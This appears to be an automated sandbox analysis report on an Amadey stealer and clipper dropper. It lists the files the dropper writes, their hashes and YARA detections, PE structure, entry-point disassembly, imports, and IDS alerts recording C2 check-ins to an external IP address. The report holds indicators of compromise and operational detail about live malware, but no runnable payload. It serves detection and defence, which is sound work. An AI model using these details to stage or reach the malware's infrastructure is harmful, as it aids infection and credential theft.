                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey's Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dll, Author: Joe Security
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 81%
                                                                      Joe Sandbox View:
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: QEb6ybdVBd.exe, Detection: malicious, Browse
                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:modified
                                                                      Size (bytes):241664
                                                                      Entropy (8bit):6.368190069123744
                                                                      Encrypted:false
                                                                      SSDEEP:6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
                                                                      MD5:8BB923C4D81284DAEF7896E5682DF6C6
                                                                      SHA1:67E34A96B77E44B666C5479F540995BDEACF5DE2
                                                                      SHA-256:9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                                                                      SHA-512:2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 81%
                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):395776
                                                                      Entropy (8bit):7.700821822499256
                                                                      Encrypted:false
                                                                      SSDEEP:6144:Kuy+bnr+Fp0yN90QEdou/MT3yfKRhwgGBP4dN4KuggSKDOjqrYy+znugWIP7FNs+:yMrpy90XMT3ySo9Q/4PSzF/FN0n/tm
                                                                      MD5:E61222B4D82A6007A553851456BCC651
                                                                      SHA1:3EFB6A00C37F1419CC454C7E37F183BB25239DE6
                                                                      SHA-256:A29FD1E2D980E7B3502DEFA0A7184C7E2947055F95396D887294E28D51185690
                                                                      SHA-512:D8B0B2B0088E5CA58045140F9B8CB7681EB5AFFAEA2AC015E4B85911F7C0E4E57B4687BA5913A21F1221FD375ACBBB3A293EB0EE0F8B7008B85D320E45A3DF27
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 49%
                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:modified
                                                                      Size (bytes):241664
                                                                      Entropy (8bit):6.368190069123744
                                                                      Encrypted:false
                                                                      SSDEEP:6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
                                                                      MD5:8BB923C4D81284DAEF7896E5682DF6C6
                                                                      SHA1:67E34A96B77E44B666C5479F540995BDEACF5DE2
                                                                      SHA-256:9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                                                                      SHA-512:2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 81%
                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):371712
                                                                      Entropy (8bit):6.668565124013179
                                                                      Encrypted:false
                                                                      SSDEEP:6144:x/LzDM0Y/Wuw3iNcTfi5xExViGUTuQj9gZaM5:x/PD8WDyGViBTlj6ZD
                                                                      MD5:01BC3DF99AB67BABCDC1577241E3EE87
                                                                      SHA1:C11C6465D4DE6B6588B565C577A9EAAD80D409D4
                                                                      SHA-256:778BD7B213D42773DEEB1DF58089F30FC9310555A97A9654A90AFB63208BBC9A
                                                                      SHA-512:107CA576ED9599A079F9C2E90EDE1F60313A59C0C46B99272665A5D8B56166DC7AF422B9E8CD65C20FD7F878D03C64A06ED0AF943B95967E92B8CCB4AABC6A95
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 28%
                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:modified
                                                                      Size (bytes):11264
                                                                      Entropy (8bit):4.97029807367379
                                                                      Encrypted:false
                                                                      SSDEEP:96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
                                                                      MD5:7E93BACBBC33E6652E147E7FE07572A0
                                                                      SHA1:421A7167DA01C8DA4DC4D5234CA3DD84E319E762
                                                                      SHA-256:850CD190AAEEBCF1505674D97F51756F325E650320EAF76785D954223A9BEE38
                                                                      SHA-512:250169D7B6FCEBFF400BE89EDAE8340F14130CED70C340BA9DA9F225F62B52B35F6645BFB510962EFB866F988688CB42392561D3E6B72194BC89D310EA43AA91
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 82%
                                                                      Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):91136
                                                                      Entropy (8bit):6.3469756750979025
                                                                      Encrypted:false
                                                                      SSDEEP:1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
                                                                      MD5:C79B74D8FEC5E7E2BA2F1789FD582A15
                                                                      SHA1:78A1E5D99DBACCC5E07B125E1DFB280112CB3128
                                                                      SHA-256:B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                                                                      SHA-512:0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey's Clipper DLL, Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Author: Joe Security
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 81%
                                                                      Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):162
                                                                      Entropy (8bit):4.621829903792328
                                                                      Encrypted:false
                                                                      SSDEEP:3:qVoB3tURObOb0qHXboAcMBXqWrKb0GklIVLLPROZ/eIwcWWGu:q43tIkObRHXiMIWObtklI5LPROeIpfGu
                                                                      MD5:1B7C22A214949975556626D7217E9A39
                                                                      SHA1:D01C97E2944166ED23E47E4A62FF471AB8FA031F
                                                                      SHA-256:340C8464C2007CE3F80682E15DFAFA4180B641D53C14201B929906B7B0284D87
                                                                      SHA-512:BA64847CF1D4157D50ABE4F4A1E5C1996FE387C5808E2F758C7FB3213BFEFE1F3712D343F0C30A16819749840954654A70611D2250FD0F7B032429DB7AFD2CC5
                                                                      Malicious:false
                                                                      Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.18.0 (Ubuntu)</center>..</body>..</html>..
                                                                      Process:C:\Windows\SysWOW64\cacls.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):15
                                                                      Entropy (8bit):3.240223928941852
                                                                      Encrypted:false
                                                                      SSDEEP:3:o3F:o1
                                                                      MD5:509B054634B6DE74F111C3E646BC80FD
                                                                      SHA1:99B4C0F39144A92FE42E22473A2A2552FB16BD13
                                                                      SHA-256:07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
                                                                      SHA-512:A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
                                                                      Malicious:false
                                                                      Preview:processed dir:
                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):7.831493173388932
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:file.exe
                                                                      File size:587776
                                                                      MD5:3ac20281c213c418608fcea6d744ae8f
                                                                      SHA1:694ee56f317c410cce4bb0dec9b1d6b6f4059f48
                                                                      SHA256:f33d6a14fc683aa41846e4073347b71810d835e5f7695dd834b98007826ec831
                                                                      SHA512:e07863755daa7e2fe075a6541f3bcb05c805eb807bbd6cbbe90bc659dfd1ea5b74d39ab03da1891eefbb32b64897c3ff98f28cd720648c879f0797df988872f6
                                                                      SSDEEP:12288:DMrky90ARrgdnN+A+9B1e04d/0htzFDFN0n/tL35gox8j:zyrOVK4dshHP0n/V3Rqj
                                                                      TLSH:50C40243B7E84572E8B41B700DFA03C30A36FE915639825B264EBE5E1C73664723676B
                                                                      Icon Hash:f8e0e4e8ecccc870
                                                                      Entrypoint:0x406a60
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:10
                                                                      OS Version Minor:0
                                                                      File Version Major:10
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:10
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:646167cce332c1c252cdcb1839e0cf48
                                                                      Instruction
                                                                      call 00007F2444AA48A5h
                                                                      jmp 00007F2444AA41B5h
                                                                      push 00000058h
                                                                      push 004072B8h
                                                                      call 00007F2444AA4947h
                                                                      xor ebx, ebx
                                                                      mov dword ptr [ebp-20h], ebx
                                                                      lea eax, dword ptr [ebp-68h]
                                                                      push eax
                                                                      call dword ptr [0040A184h]
                                                                      mov dword ptr [ebp-04h], ebx
                                                                      mov eax, dword ptr fs:[00000018h]
                                                                      mov esi, dword ptr [eax+04h]
                                                                      mov edi, ebx
                                                                      mov edx, 004088ACh
                                                                      mov ecx, esi
                                                                      xor eax, eax
                                                                      lock cmpxchg dword ptr [edx], ecx
                                                                      test eax, eax
                                                                      je 00007F2444AA41CAh
                                                                      cmp eax, esi
                                                                      jne 00007F2444AA41B9h
                                                                      xor esi, esi
                                                                      inc esi
                                                                      mov edi, esi
                                                                      jmp 00007F2444AA41C2h
                                                                      push 000003E8h
                                                                      call dword ptr [0040A188h]
                                                                      jmp 00007F2444AA4189h
                                                                      xor esi, esi
                                                                      inc esi
                                                                      cmp dword ptr [004088B0h], esi
                                                                      jne 00007F2444AA41BCh
                                                                      push 0000001Fh
                                                                      call 00007F2444AA46DBh
                                                                      pop ecx
                                                                      jmp 00007F2444AA41ECh
                                                                      cmp dword ptr [004088B0h], ebx
                                                                      jne 00007F2444AA41DEh
                                                                      mov dword ptr [004088B0h], esi
                                                                      push 004010C4h
                                                                      push 004010B8h
                                                                      call 00007F2444AA4306h
                                                                      pop ecx
                                                                      pop ecx
                                                                      test eax, eax
                                                                      je 00007F2444AA41C9h
                                                                      mov dword ptr [ebp-04h], FFFFFFFEh
                                                                      mov eax, 000000FFh
                                                                      jmp 00007F2444AA42E9h
                                                                      mov dword ptr [004081E4h], esi
                                                                      cmp dword ptr [004088B0h], esi
                                                                      jne 00007F2444AA41CDh
                                                                      push 004010B4h
                                                                      push 004010ACh
                                                                      call 00007F2444AA4895h
                                                                      pop ecx
                                                                      pop ecx
                                                                      mov dword ptr [000088B0h], 00000000h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa28c | 0xb4 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x870ec | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x94000 | 0x888 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1410 | 0x54 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1008 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xa000 | 0x288 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6314 | 0x6400 | False | 0.5744140625 | data | 6.314163792045976 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x8000 | 0x1a48 | 0x200 | False | 0.609375 | data | 4.970639543960129 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xa000 | 0x1052 | 0x1200 | False | 0.4140625 | data | 5.025949912909207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0xc000 | 0x88000 | 0x87200 | False | 0.9312774629972248 | data | 7.8718708761847305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x94000 | 0x888 | 0xa00 | False | 0.746484375 | data | 6.222637930812128 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
AVI | 0xcb30 | 0x2e1a | RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp | English | United States
RT_ICON | 0xf94c | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States
RT_ICON | 0xffb4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States
RT_ICON | 0x1029c | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States
RT_ICON | 0x10484 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States
RT_ICON | 0x105ac | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States
RT_ICON | 0x11454 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States
RT_ICON | 0x11cfc | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States
RT_ICON | 0x123c4 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States
RT_ICON | 0x1292c | 0xd9d2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x20300 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States
RT_ICON | 0x228a8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States
RT_ICON | 0x23950 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States
RT_ICON | 0x242d8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States
RT_DIALOG | 0x24740 | 0x2f2 | data | English | United States
RT_DIALOG | 0x24a34 | 0x35c | data | Russian | Russia
RT_DIALOG | 0x24d90 | 0x1b0 | data | English | United States
RT_DIALOG | 0x24f40 | 0x1b4 | data | Russian | Russia
RT_DIALOG | 0x250f4 | 0x166 | data | English | United States
RT_DIALOG | 0x2525c | 0x168 | data | Russian | Russia
RT_DIALOG | 0x253c4 | 0x1c0 | data | English | United States
RT_DIALOG | 0x25584 | 0x1e0 | data | Russian | Russia
RT_DIALOG | 0x25764 | 0x130 | data | English | United States
RT_DIALOG | 0x25894 | 0x150 | data | Russian | Russia
RT_DIALOG | 0x259e4 | 0x120 | data | English | United States
RT_DIALOG | 0x25b04 | 0x122 | data | Russian | Russia
RT_STRING | 0x25c28 | 0x8c | Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0 | English | United States
RT_STRING | 0x25cb4 | 0x86 | Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0 | Russian | Russia
RT_STRING | 0x25d3c | 0x520 | data | English | United States
RT_STRING | 0x2625c | 0x52e | data | Russian | Russia
RT_STRING | 0x2678c | 0x5cc | data | English | United States
RT_STRING | 0x26d58 | 0x592 | data | Russian | Russia
RT_STRING | 0x272ec | 0x4b0 | data | English | United States
RT_STRING | 0x2779c | 0x4b2 | data | Russian | Russia
RT_STRING | 0x27c50 | 0x44a | data | English | United States
RT_STRING | 0x2809c | 0x43e | data | Russian | Russia
RT_STRING | 0x284dc | 0x3ce | data | English | United States
RT_STRING | 0x288ac | 0x2fc | data | Russian | Russia
RT_RCDATA | 0x28ba8 | 0x7 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x28bb0 | 0x6940e | Microsoft Cabinet archive data, many, 431118 bytes, 2 files, at 0x2c +A "brJg.exe" +A "xriv.exe", ID 1582, number 1, 20 datablocks, 0x1503 compression | English | United States
RT_RCDATA | 0x91fc0 | 0x4 | data | English | United States
RT_RCDATA | 0x91fc4 | 0x24 | data | English | United States
RT_RCDATA | 0x91fe8 | 0x7 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x91ff0 | 0x7 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x91ff8 | 0x4 | data | English | United States
RT_RCDATA | 0x91ffc | 0x9 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x92008 | 0x4 | data | English | United States
RT_RCDATA | 0x9200c | 0x9 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x92018 | 0x4 | data | English | United States
RT_RCDATA | 0x9201c | 0x6 | data | English | United States
RT_RCDATA | 0x92024 | 0x7 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x9202c | 0x7 | ASCII text, with no line terminators | English | United States
RT_GROUP_ICON | 0x92034 | 0xbc | data | English | United States
RT_VERSION | 0x920f0 | 0x408 | data | English | United States
RT_VERSION | 0x924f8 | 0x410 | data | Russian | Russia
RT_MANIFEST | 0x92908 | 0x7e2 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States
DLL | Import
ADVAPI32.dll | GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll | _lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
GDI32.dll | GetDeviceCaps
USER32.dll | SetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
msvcrt.dll | _controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
COMCTL32.dll |
Cabinet.dll |
VERSION.dll | GetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA
Language of compilation system | Country where language is spoken
English | United States
Russian | Russia
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                                      192.168.2.762.204.41.449896802027700 02/06/23-18:36:41.854218TCP2027700ET TROJAN Amadey CnC Check-In4989680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450004802027700 02/06/23-18:37:15.494599TCP2027700ET TROJAN Amadey CnC Check-In5000480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450341802027700 02/06/23-18:38:42.838470TCP2027700ET TROJAN Amadey CnC Check-In5034180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450356802027700 02/06/23-18:38:48.308768TCP2027700ET TROJAN Amadey CnC Check-In5035680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449994802027700 02/06/23-18:37:10.684632TCP2027700ET TROJAN Amadey CnC Check-In4999480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449915802027700 02/06/23-18:36:49.430014TCP2027700ET TROJAN Amadey CnC Check-In4991580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450145802027700 02/06/23-18:37:52.348178TCP2027700ET TROJAN Amadey CnC Check-In5014580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449793802027700 02/06/23-18:36:14.067336TCP2027700ET TROJAN Amadey CnC Check-In4979380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449933802027700 02/06/23-18:36:55.825769TCP2027700ET TROJAN Amadey CnC Check-In4993380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450163802027700 02/06/23-18:37:56.641063TCP2027700ET TROJAN Amadey CnC Check-In5016380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449755802027700 02/06/23-18:36:05.145544TCP2027700ET TROJAN Amadey CnC Check-In4975580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450155802027700 02/06/23-18:37:54.734217TCP2027700ET TROJAN Amadey CnC Check-In5015580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449951802027700 02/06/23-18:37:00.088634TCP2027700ET TROJAN Amadey CnC Check-In4995180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450060802027700 02/06/23-18:37:28.997105TCP2027700ET TROJAN Amadey CnC Check-In5006080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449827802027700 02/06/23-18:36:24.116181TCP2027700ET TROJAN Amadey CnC Check-In4982780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449910802027700 02/06/23-18:36:48.230042TCP2027700ET TROJAN Amadey CnC Check-In4991080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450351802027700 02/06/23-18:38:47.071030TCP2027700ET TROJAN Amadey CnC Check-In5035180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449732802027700 02/06/23-18:35:59.129342TCP2027700ET TROJAN Amadey CnC Check-In4973280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449809802027700 02/06/23-18:36:19.755075TCP2027700ET TROJAN Amadey CnC Check-In4980980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450196802027700 02/06/23-18:38:04.592802TCP2027700ET TROJAN Amadey CnC Check-In5019680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450328802027700 02/06/23-18:38:39.535775TCP2027700ET TROJAN Amadey CnC Check-In5032880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450109802027700 02/06/23-18:37:42.135759TCP2027700ET TROJAN Amadey CnC Check-In5010980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450178802027700 02/06/23-18:38:00.218801TCP2027700ET TROJAN Amadey CnC Check-In5017880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449773802027700 02/06/23-18:36:09.507798TCP2027700ET TROJAN Amadey CnC Check-In4977380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450137802027700 02/06/23-18:37:50.172258TCP2027700ET TROJAN Amadey CnC Check-In5013780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450333802027700 02/06/23-18:38:40.754989TCP2027700ET TROJAN Amadey CnC Check-In5033380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449810802027700 02/06/23-18:36:19.991660TCP2027700ET TROJAN Amadey CnC Check-In4981080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450305802027700 02/06/23-18:38:34.163427TCP2027700ET TROJAN Amadey CnC Check-In5030580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450173802027700 02/06/23-18:37:59.034324TCP2027700ET TROJAN Amadey CnC Check-In5017380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449905802027700 02/06/23-18:36:44.026160TCP2027700ET TROJAN Amadey CnC Check-In4990580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450210802027700 02/06/23-18:38:09.556488TCP2027700ET TROJAN Amadey CnC Check-In5021080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450268802027700 02/06/23-18:38:23.521301TCP2027700ET TROJAN Amadey CnC Check-In5026880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449727802027700 02/06/23-18:35:56.731345TCP2027700ET TROJAN Amadey CnC Check-In4972780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449868802027700 02/06/23-18:36:33.899866TCP2027700ET TROJAN Amadey CnC Check-In4986880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450251802027700 02/06/23-18:38:19.454938TCP2027700ET TROJAN Amadey CnC Check-In5025180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450191802027700 02/06/23-18:38:03.374137TCP2027700ET TROJAN Amadey CnC Check-In5019180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449837802027700 02/06/23-18:36:26.550389TCP2027700ET TROJAN Amadey CnC Check-In4983780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450168802027700 02/06/23-18:37:57.812117TCP2027700ET TROJAN Amadey CnC Check-In5016880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450165802027700 02/06/23-18:37:57.109837TCP2027700ET TROJAN Amadey CnC Check-In5016580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450300802027700 02/06/23-18:38:32.957646TCP2027700ET TROJAN Amadey CnC Check-In5030080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449898802027700 02/06/23-18:36:42.338054TCP2027700ET TROJAN Amadey CnC Check-In4989880192.168.2.762.204.41.4
